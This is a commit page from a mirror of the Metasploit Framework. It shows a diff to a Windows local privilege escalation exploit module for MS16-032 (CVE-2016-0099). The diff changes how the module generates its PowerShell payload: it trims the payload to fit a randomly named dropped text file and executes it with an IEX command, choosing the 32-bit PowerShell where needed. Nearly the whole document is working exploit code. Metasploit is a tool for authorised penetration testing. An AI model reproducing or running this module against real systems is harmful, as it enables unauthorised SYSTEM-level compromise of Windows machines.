infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix Payload Generation 

Payload generation now only occurs once and function 'setup_pay'
removed.  Payload is generated with cmd_psh_payload and is mutated to
fit dropped text file.
bug/bundler_fix
khr0x40sh 2016-06-23 11:20:22 -04:00
parent df1a9bee13
commit 40d7de05ef
1 changed files with 14 additions and 32 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

46
modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
View File

@ -5,10 +5,11 @@
require 'msf/core' require 'msf/core'
require 'msf/core/payload_generator' require 'msf/core/payload_generator'
require 'msf/core/exploit/powershell'
require 'rex' require 'rex'
class MetasploitModule < Msf::Exploit::Local class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking Rank = NormalRanking
include Msf::Exploit::Powershell include Msf::Exploit::Powershell
include Msf::Post::File include Msf::Post::File
@ -93,9 +94,19 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve-2016-0099.ps1') ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve-2016-0099.ps1')
vprint_status("PS1 loaded from #{ps_path}") vprint_status("PS1 loaded from #{ps_path}")
ms16_032 = File.read(ps_path) ms16_032 = File.read(ps_path)
cmdstr=expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
cmdstr.gsub!("System32","SYSWOW64")
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
vprint_warning("#{cmdstr}")
end
# Using venom_generator to produce compressed powershell script. See class at bottom of module. #payload formatted to fit dropped text file
payl = setup_pay payl = cmd_psh_payload(payload.encoded,payload.arch,{:encode_final_payload => false, :remove_comspec => true, :method => 'old'})
payl.sub!(/.*?(?=New-Object IO)/im, "")
payl = payl.split("';$s.")[0]
payl.gsub!("''","'")
payl = "$s=#{payl}"
@upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt" @upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
path = datastore['W_PATH'] || pwd path = datastore['W_PATH'] || pwd
@ -106,13 +117,6 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
fd.close fd.close
psh_cmd = "IEX `$(gc #{@upfile})" psh_cmd = "IEX `$(gc #{@upfile})"
cmdstr=expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
cmdstr.gsub!("System32","SYSWOW64")
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
vprint_warning("#{cmdstr}")
end
#lpAppName #lpAppName
ms16_032.gsub!("$cmd","\"#{cmdstr}\"") ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
#lpcommandLine - capped at 1024b #lpcommandLine - capped at 1024b
@ -158,26 +162,4 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
end end
end end
def setup_pay
generator_opts ={}
generator_opts[:payload] = datastore['PAYLOAD']
generator_opts[:datastore]= datastore
generator_opts[:format] = "psh-net"
generator_opts[:framework] = framework
begin
venom_generator = Msf::PayloadGenerator.new(generator_opts)
psh_payload = venom_generator.generate_payload
rescue ::Exception => e
elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}")
print_error(e.message)
end
compressed_payload = compress_script(psh_payload)
encoded_payload = encode_script(compressed_payload)
pay1 = compressed_payload
vprint_status("Payload size: #{compressed_payload.size}")
return pay1
end
end end